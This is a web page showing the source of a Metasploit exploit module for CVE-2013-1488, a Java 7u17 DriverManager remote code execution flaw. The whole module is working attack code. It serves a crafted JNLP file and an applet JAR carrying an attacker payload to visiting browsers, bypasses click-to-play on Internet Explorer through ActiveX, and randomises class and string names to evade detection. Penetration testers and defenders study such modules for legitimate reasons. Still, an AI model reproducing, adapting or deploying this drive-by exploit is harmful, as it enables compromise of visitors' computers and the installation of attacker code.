Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_jre17_driver_manager.rb
19511 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  # include Msf::Exploit::Remote::BrowserAutopwn

13
  # autopwn_info({ :javascript => false })

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',

20
        'Description' => %q{

21
          This module abuses the java.sql.DriverManager class where the toString() method

22
          is called over user supplied classes from a doPrivileged block. The vulnerability

23
          affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer

24
          and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java

25
          Web Start can be launched automatically through the ActiveX control. Otherwise, the

26
          applet is launched without click-to-play bypass.

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [

30
          'James Forshaw', # Vulnerability discovery and Analysis

31
          'juan vazquez' # Metasploit module

32
        ],

33
        'References' => [

34
          [ 'CVE', '2013-1488' ],

35
          [ 'OSVDB', '91472' ],

36
          [ 'BID', '58504' ],

37
          [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],

38
          [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],

39
          [ 'ZDI', '13-076' ]

40
        ],

41
        'Platform' => %w{java linux osx win},

42
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

43
        'Targets' => [

44
          [

45
            'Generic (Java Payload)',

46
            {

47
              'Platform' => ['java'],

48
              'Arch' => ARCH_JAVA,

49
            }

50
          ],

51
          [

52
            'Windows x86 (Native Payload)',

53
            {

54
              'Platform' => 'win',

55
              'Arch' => ARCH_X86,

56
            }

57
          ],

58
          [

59
            'Mac OS X x86 (Native Payload)',

60
            {

61
              'Platform' => 'osx',

62
              'Arch' => ARCH_X86,

63
            }

64
          ],

65
          [

66
            'Linux x86 (Native Payload)',

67
            {

68
              'Platform' => 'linux',

69
              'Arch' => ARCH_X86,

70
            }

71
          ],

72
        ],

73
        'DefaultTarget' => 0,

74
        'DisclosureDate' => '2013-01-10',

75
        'Notes' => {

76
          'Reliability' => UNKNOWN_RELIABILITY,

77
          'Stability' => UNKNOWN_STABILITY,

78
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

79
        }

80
      )

81
    )

82
  end

83


84
  def setup

85
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "Exploit.class")

86
    @exploit_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

87
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "FakeDriver.class")

88
    @driver_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

89
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "FakeDriver2.class")

90
    @driver2_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

91
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "META-INF", "services", "java.lang.Object")

92
    @object_services = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

93
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-1488", "META-INF", "services", "java.sql.Driver")

94
    @driver_services = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

95


96
    @exploit_class_name = rand_text_alpha("Exploit".length)

97
    @exploit_class.gsub!("Exploit", @exploit_class_name)

98


99
    @jnlp_name = rand_text_alpha(8)

100


101
    super

102
  end

103


104
  def jnlp_file

105
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"

106


107
    jnlp = %Q|

108
<?xml version="1.0" encoding="utf-8"?>

109
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">

110
  <information>

111
    <title>Applet Test JNLP</title>

112
    <vendor>#{rand_text_alpha(8)}</vendor>

113
    <description>#{rand_text_alpha(8)}</description>

114
    <offline-allowed/>

115
  </information>

116


117
  <resources>

118
    <j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />

119
    <jar href="#{rand_text_alpha(8)}.jar" main="true" />

120
  </resources>

121
  <applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">

122
    <param name="__applet_ssv_validated" value="true"></param>

123
  </applet-desc>

124
  <update check="background"/>

125
</jnlp>

126
    |

127
    return jnlp

128
  end

129


130
  def on_request_uri(cli, request)

131
    print_status("handling request for #{request.uri}")

132


133
    case request.uri

134
    when /\.jnlp$/i

135
      send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })

136
    when /\.jar$/i

137
      jar = payload.encoded_jar

138
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)

139
      jar.add_file("FakeDriver.class", @driver_class)

140
      jar.add_file("FakeDriver2.class", @driver2_class)

141
      jar.add_file("META-INF/services/java.lang.Object", @object_services)

142
      jar.add_file("META-INF/services/java.sql.Driver", @driver_services)

143
      metasploit_str = rand_text_alpha("metasploit".length)

144
      payload_str = rand_text_alpha("payload".length)

145
      jar.entries.each { |entry|

146
        entry.name.gsub!("metasploit", metasploit_str)

147
        entry.name.gsub!("Payload", payload_str)

148
        entry.data = entry.data.gsub("metasploit", metasploit_str)

149
        entry.data = entry.data.gsub("Payload", payload_str)

150
      }

151
      jar.build_manifest

152


153
      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })

154
    when /\/$/

155
      payload = regenerate_payload(cli)

156
      if not payload

157
        print_error("Failed to generate the payload.")

158
        send_not_found(cli)

159
        return

160
      end

161
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

162
    else

163
      send_redirect(cli, get_resource() + '/', '')

164
    end

165
  end

166


167
  def generate_html

168
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"

169


170
    # When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass

171
    # Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass

172
    html = %Q|

173
    <html>

174
    <body>

175
    <object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>

176
    <param name="app" value="#{jnlp_uri}">

177
    <param name="back" value="true">

178
    <applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>

179
    </object>

180
    </body>

181
    </html>

182
    |

183
    return html

184
  end

185
end

186


187